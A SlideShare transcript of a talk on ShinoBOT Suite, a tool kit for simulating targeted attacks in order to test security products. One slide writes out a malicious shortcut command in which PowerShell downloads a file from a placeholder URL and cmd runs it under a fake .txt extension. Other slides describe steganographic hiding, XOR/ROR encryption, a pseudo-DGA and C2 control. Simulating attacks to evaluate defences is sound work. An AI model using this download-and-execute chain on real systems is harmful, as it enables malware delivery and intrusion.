SlideShare a Scribd company logo
ShinoBOT
SUITE
The APT Simulator Tool Kit
@Sh1n0g1 1
About ME
 Shota Shinogi @Sh1n0g1
 http://shinosec.com
 Security Researcher at Macnica Networks Corp.
Japanese Disty of security/network products
 Enthusiast of writing (ethical) malware
 Presented ShinoBOT (not Suite) last year at
Arsenal
2
ShinoBOT the RAT
ShinoBOT.exe
ShinoBOT is a RAT (simulator)
 Presented at Black Hat USA 2013 Arsenal
 It connects to ShinoC2, the C&C Server using
HTTP(S).
 What you can do with ShinoBOT via ShinoC2
Execute a command
Upload / Download a file
Take a screen shot
 It is a SIMULATOR
it has a GUI
you need the password which is showed on the GUI to
control it
3
What is ShinoBOT Suite
ShinoBOT Suite is a tool kit to create an APT attack
with just a few clicks, to simulate a highly-
sophisticated attack campaign.
 What is contained
Exploit (Shortcut contains a malicious script)
Malware Delivery Server (ShinoMAL.mooo.com)
Downloader/Dropper (ShinoDownloader.exe)
RAT (ShinoBOT.exe)
C&C Server (ShinoC2]
Steganography, crypto, DGA and some evasion
techniques
4
Why ShinoBOT Suite ?
 There is a bunch of new security tools to
detect/response the unknown threat
Sandbox based Malware Detection System
ETDR (Endpoint Threat Detect & Response)
SIEM (Security Information & Event Manager)
Security Analytics / Network Forensics
 It is hard to evaluate those new products
Known malware will be detected by signature
♦ ≠ Unknown Threat
To simulate a realistic APT
♦ requires a high skill
♦ takes too much time
♦ spends a lot of money using some commercial tools
5
ShinoBOT Suite Campaign
Malicious
Shortcut
Downloader
Dropper
RAT
Decoy File
C&C
Server
Malware
Deploy
Server
dldr_tmp
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication
1)Download
2)Execute
img.jpg
3)Drop
6)Decrypt
7)Execute
6
ShinoBOT Suite Campaign
Malicious
Shortcut
Downloader
Dropper
RAT
Decoy File
C&C
Server
Malware
Deploy
Server
dldr_tmp
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication
1)Download
2)Execute
img.jpg
3)Drop
6)Decrypt
7)Execute
7
ShinoMAL ShinoC2
ShinoBOT
Shino
Downloader
DEMONSTRATION STEP1
8
9
DEMONSTRATION STEP2
10
DEMONSTRATION STEP3
11
DEMONSTRATION STEP4
12
DEMONSTRATION STEP3
13
DEMONSTRATION RUN
Decoy File
ShinoBOT works in
background
14
DEMONSTRATION CONTROL1
To control ShinoBOT (RAT), you need to grab
the password, it is to prevent the abuse of
ShinoBOT.
ShinoBOT saved its password to the same
folder (C:Users%USERNAME%sb.pas)
You can access to the password word file
remotely.
%MACHINENAME%C$Users%USERNAME%sb.pas
15
DEMONSTRATION CONTROL2
To control ShinoBOT (RAT), you need to grab
the password, it is to prevent the abuse of
ShinoBOT.
ShinoBOT saved its password in this text file.
(C:Users%USERNAME%sb.pas)
You can access to the password word file
remotely.
%MACHINENAME%C$Users%USERNAME%sb.pas
 This password protection is to prevent the real guys to abuse
ShinoBOT.
16
DEMONSTATION CONTROL3
Access to ShinoBOT.com
Go to the host list
Your host will appear in the host list
Click the [View/Assign Jobs] link
17
DEMONSTATION CONTROL4
Put the password to see the Loot (result) of the
command
Put the password to assign a new job
Technical Detail 1
Malicious Shortcut
"target" of the shortcut (all in 1 line)
cmd.exe /c
powershell
(new objectSystem.Net.WebClient)
.DownloadFile('DOWNLOADERURL', '%TEMP%LicenseRnd.txt');
&
%TEMP%LicenseRnd.txt
&
::DECOYFILENAME
POWERSHELL downloads the downloader, and save it
CMD executes the downloader(Rnd means random string)
CMD ignores this line because :: means a comment
18
Technical Detail 2
Extension Spoofing
On the target of shortcut, there is the line
"%TEMP%LicenseRnd.txt" (previous slide)
Usually, when you double click the file with .txt,
the notepad will launch
CMD.exe can execute the executables(contains
the MZ header) with any extension
ShinoBOT Suite uses this techniques to spoof
the extension, and make the donwloader hard
to be found from the disk Actually, it is the
ShinoDownloader.exe
19
Technical Detail 3
Crypto Stuff
ShinoBOT Suite uses XOR and ROR (4 bit rotate)
Key is used just for the XOR, and ROR is always 4
bits
ShinoBOT Suite generates a random key (200 ~
255 byte) so it is little bit difficult to decrypt the
whole file without having the key
20
Technical Detail 4
Steganography
The encrypted RAT is hidden in the kitten image.
JPG data
Encrypted RAT
[Binary Visualizer]
21
22
Technical Detail 5
Domain Generation Algorithm
ShinoBOT (the RAT) uses pseudo-DGA.
It generates a random host name for the C2
Server.
rrrr.r.shinobot.com
" r " is replaced by a random character.
The DNS of shinobot.com responds any host
with the C2 server IP address.
All Components are customizable,
modulable
Exploit
ShellCode
Downloader
Dropper
RAT
Decoy File
C&C
Server
Malware
Deploy
Server
KB1234567.exe
Invitation.pdf
Invitation.pdf
(legitimate)
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication
1)Download
2)Execute
img.jpg
3)Drop
KB1234567.exe
6)Decrypt
7)Execute
Phishing Email
23
Thank you
Visit my site and get the
recipe of ShinoBOT SUITE.
http://shinosec.com 24

More Related Content

What's hot

CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CanSecWest
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
CanSecWest
 
Solnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecSolnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsec
PacSecJP
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Tamas K Lengyel
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
Peter Hlavaty
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardware
Tamas K Lengyel
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
Luis Grangeia
 
Kasza smashing the_jars
Kasza smashing the_jarsKasza smashing the_jars
Kasza smashing the_jars
PacSecJP
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel Exploitation
zeroSteiner
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
Peter Hlavaty
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
Tamas K Lengyel
 
Injection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniquesInjection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniques
enSilo
 
Android Attacks
Android AttacksAndroid Attacks
Android Attacks
Michael Scovetta
 
Captain Hook: Pirating AVs to Bypass Exploit Mitigations
Captain Hook: Pirating AVs to Bypass Exploit MitigationsCaptain Hook: Pirating AVs to Bypass Exploit Mitigations
Captain Hook: Pirating AVs to Bypass Exploit Mitigations
enSilo
 
OffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenOffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with Xen
Tamas K Lengyel
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
Zoltan Balazs
 
Defcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomDefcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-room
Priyanka Aash
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
midnite_runr
 

What's hot (20)

CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
Solnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsecSolnik secure enclaveprocessor-pacsec
Solnik secure enclaveprocessor-pacsec
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
 
Rainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could ExpectRainbow Over the Windows: More Colors Than You Could Expect
Rainbow Over the Windows: More Colors Than You Could Expect
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardware
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
 
Kasza smashing the_jars
Kasza smashing the_jarsKasza smashing the_jars
Kasza smashing the_jars
 
Practical Windows Kernel Exploitation
Practical Windows Kernel ExploitationPractical Windows Kernel Exploitation
Practical Windows Kernel Exploitation
 
Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!Ice Age melting down: Intel features considered usefull!
Ice Age melting down: Intel features considered usefull!
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
 
Injection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniquesInjection on Steroids: Codeless code injection and 0-day techniques
Injection on Steroids: Codeless code injection and 0-day techniques
 
Android Attacks
Android AttacksAndroid Attacks
Android Attacks
 
Captain Hook: Pirating AVs to Bypass Exploit Mitigations
Captain Hook: Pirating AVs to Bypass Exploit MitigationsCaptain Hook: Pirating AVs to Bypass Exploit Mitigations
Captain Hook: Pirating AVs to Bypass Exploit Mitigations
 
OffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with XenOffensiveCon2022: Case Studies of Fuzzing with Xen
OffensiveCon2022: Case Studies of Fuzzing with Xen
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Defcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomDefcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-room
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013
 

Similar to ShinoBOT Suite

DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
Felipe Prado
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
EC-Council
 
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
CODE BLUE
 
Backtrack Manual Part4
Backtrack Manual Part4Backtrack Manual Part4
Backtrack Manual Part4
Nutan Kumar Panda
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
Felipe Prado
 
UEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealityUEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and Reality
Sally Feller
 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 -  Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 -  Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
securityxploded
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
Deepanshu Gajbhiye
 
Remote control adding
Remote control addingRemote control adding
Remote control adding
Lidiia Nesterenko
 
RCCreator Guidance. Remote control adding (copy codes from your original remo...
RCCreator Guidance. Remote control adding (copy codes from your original remo...RCCreator Guidance. Remote control adding (copy codes from your original remo...
RCCreator Guidance. Remote control adding (copy codes from your original remo...
Lidiia Nesterenko
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
Run Go applications on Pico using TinyGo
Run Go applications on Pico using TinyGo Run Go applications on Pico using TinyGo
Run Go applications on Pico using TinyGo
Yu-Shuan Hsieh
 
snortinstallguide
snortinstallguidesnortinstallguide
snortinstallguide
Liễu Hồng
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
Xdebug
XdebugXdebug
From printed circuit boards to exploits
From printed circuit boards to exploitsFrom printed circuit boards to exploits
From printed circuit boards to exploits
virtualabs
 
Piratng Avs to bypass exploit mitigation
Piratng Avs to bypass exploit mitigationPiratng Avs to bypass exploit mitigation
Piratng Avs to bypass exploit mitigation
Priyanka Aash
 
Basic malware analysis
Basic malware analysis Basic malware analysis
Basic malware analysis
Cysinfo Cyber Security Community
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Maksim Shudrak
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to Android
Vlatko Kosturjak
 

Similar to ShinoBOT Suite (20)

DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
[CB21] The Lazarus Group's Attack Operations Targeting Japan by Shusei Tomona...
 
Backtrack Manual Part4
Backtrack Manual Part4Backtrack Manual Part4
Backtrack Manual Part4
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
 
UEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and RealityUEFI Firmware Rootkits: Myths and Reality
UEFI Firmware Rootkits: Myths and Reality
 
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 -  Advanced Malware AnalysisReversing & Malware Analysis Training Part 9 -  Advanced Malware Analysis
Reversing & Malware Analysis Training Part 9 - Advanced Malware Analysis
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
 
Remote control adding
Remote control addingRemote control adding
Remote control adding
 
RCCreator Guidance. Remote control adding (copy codes from your original remo...
RCCreator Guidance. Remote control adding (copy codes from your original remo...RCCreator Guidance. Remote control adding (copy codes from your original remo...
RCCreator Guidance. Remote control adding (copy codes from your original remo...
 
Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8Cracking Into Embedded Devices - HACK.LU 2K8
Cracking Into Embedded Devices - HACK.LU 2K8
 
Run Go applications on Pico using TinyGo
Run Go applications on Pico using TinyGo Run Go applications on Pico using TinyGo
Run Go applications on Pico using TinyGo
 
snortinstallguide
snortinstallguidesnortinstallguide
snortinstallguide
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Xdebug
XdebugXdebug
Xdebug
 
From printed circuit boards to exploits
From printed circuit boards to exploitsFrom printed circuit boards to exploits
From printed circuit boards to exploits
 
Piratng Avs to bypass exploit mitigation
Piratng Avs to bypass exploit mitigationPiratng Avs to bypass exploit mitigation
Piratng Avs to bypass exploit mitigation
 
Basic malware analysis
Basic malware analysis Basic malware analysis
Basic malware analysis
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
 
Porting your favourite cmdline tool to Android
Porting your favourite cmdline tool to AndroidPorting your favourite cmdline tool to Android
Porting your favourite cmdline tool to Android
 

More from Shota Shinogi

LLM App Hacking (AVTOKYO2023)
LLM App Hacking (AVTOKYO2023)LLM App Hacking (AVTOKYO2023)
LLM App Hacking (AVTOKYO2023)
Shota Shinogi
 
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptxネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
Shota Shinogi
 
HamaCTF WriteUp (Unpack category)
HamaCTF WriteUp (Unpack category)HamaCTF WriteUp (Unpack category)
HamaCTF WriteUp (Unpack category)
Shota Shinogi
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)
Shota Shinogi
 
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
Shota Shinogi
 
AndroidとPCのみでスマート電球BLEハッキング
AndroidとPCのみでスマート電球BLEハッキングAndroidとPCのみでスマート電球BLEハッキング
AndroidとPCのみでスマート電球BLEハッキング
Shota Shinogi
 
Honeypot Spotted
Honeypot SpottedHoneypot Spotted
Honeypot Spotted
Shota Shinogi
 
Sigcheck option memo
Sigcheck option memoSigcheck option memo
Sigcheck option memo
Shota Shinogi
 
RISEconf 2015 UNOFFICIAL Schedule
RISEconf 2015 UNOFFICIAL ScheduleRISEconf 2015 UNOFFICIAL Schedule
RISEconf 2015 UNOFFICIAL Schedule
Shota Shinogi
 
Hexdump memo
Hexdump memoHexdump memo
Hexdump memo
Shota Shinogi
 

More from Shota Shinogi (10)

LLM App Hacking (AVTOKYO2023)
LLM App Hacking (AVTOKYO2023)LLM App Hacking (AVTOKYO2023)
LLM App Hacking (AVTOKYO2023)
 
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptxネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
ネットストーカー御用達OSINTツールBlackBirdを触ってみた.pptx
 
HamaCTF WriteUp (Unpack category)
HamaCTF WriteUp (Unpack category)HamaCTF WriteUp (Unpack category)
HamaCTF WriteUp (Unpack category)
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)
 
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
ドラえもんの秘密道具「夜ランプ」を作ろうとした話(ネタ)
 
AndroidとPCのみでスマート電球BLEハッキング
AndroidとPCのみでスマート電球BLEハッキングAndroidとPCのみでスマート電球BLEハッキング
AndroidとPCのみでスマート電球BLEハッキング
 
Honeypot Spotted
Honeypot SpottedHoneypot Spotted
Honeypot Spotted
 
Sigcheck option memo
Sigcheck option memoSigcheck option memo
Sigcheck option memo
 
RISEconf 2015 UNOFFICIAL Schedule
RISEconf 2015 UNOFFICIAL ScheduleRISEconf 2015 UNOFFICIAL Schedule
RISEconf 2015 UNOFFICIAL Schedule
 
Hexdump memo
Hexdump memoHexdump memo
Hexdump memo
 

Recently uploaded

"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
Fwdays
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
Day 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio FundamentalsDay 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio Fundamentals
UiPathCommunity
 
ScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking ReplicationScyllaDB Tablets: Rethinking Replication
ScyllaDB Tablets: Rethinking Replication
ScyllaDB
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
DianaGray10
 
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and BioinformaticiansBiomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Biomedical Knowledge Graphs for Data Scientists and Bioinformaticians
Neo4j
 
Getting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
Getting the Most Out of ScyllaDB Monitoring: ShareChat's TipsGetting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
Getting the Most Out of ScyllaDB Monitoring: ShareChat's Tips
ScyllaDB
 
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge GraphGraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
GraphRAG for LifeSciences Hands-On with the Clinical Knowledge Graph
Neo4j
 
Y-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PPY-Combinator seed pitch deck template PP
Y-Combinator seed pitch deck template PP
c5vrf27qcz
 
MySQL InnoDB Storage Engine: Deep Dive - Mydbops
MySQL InnoDB Storage Engine: Deep Dive - MydbopsMySQL InnoDB Storage Engine: Deep Dive - Mydbops
MySQL InnoDB Storage Engine: Deep Dive - Mydbops
Mydbops
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ivo Velitchkov
 
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfLee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdf
leebarnesutopia
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
FilipTomaszewski5
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and StandardsLeveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Neo4j
 
GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)GNSS spoofing via SDR (Criptored Talks 2024)
GNSS spoofing via SDR (Criptored Talks 2024)
Javier Junquera
 

Recently uploaded (20)

"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba"NATO Hackathon Winner: AI-Powered Drug Search",  Taras Kloba
"NATO Hackathon Winner: AI-Powered Drug Search", Taras Kloba
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
 
"Choosing proper type of scaling", Olena Syrota
